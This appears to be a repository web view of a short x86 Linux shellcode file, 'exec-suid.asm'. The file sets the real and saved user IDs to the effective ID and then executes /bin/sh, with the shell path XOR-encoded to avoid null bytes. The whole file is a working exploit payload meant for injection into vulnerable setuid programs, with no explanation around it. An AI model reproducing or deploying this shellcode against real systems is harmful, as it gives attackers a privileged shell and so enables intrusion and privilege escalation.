summaryrefslogtreecommitdiff
path: root/shellcode/exec-suid.asm
blob: b978195db23e0cefa8847bd2079157f4006d7097 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
xor eax, eax
add al, 201
int 0x80
mov ebx, eax
mov ecx, eax
mov edx, eax
xor eax, eax
add al, 208
int 0x80
xor eax, eax
add al, 11
mov ebx, 0x3058431f
xor ebx, 0x30303030
push ebx
push 0x6e69622f
mov ebx, esp
xor ecx, ecx
xor edx, edx
int 0x80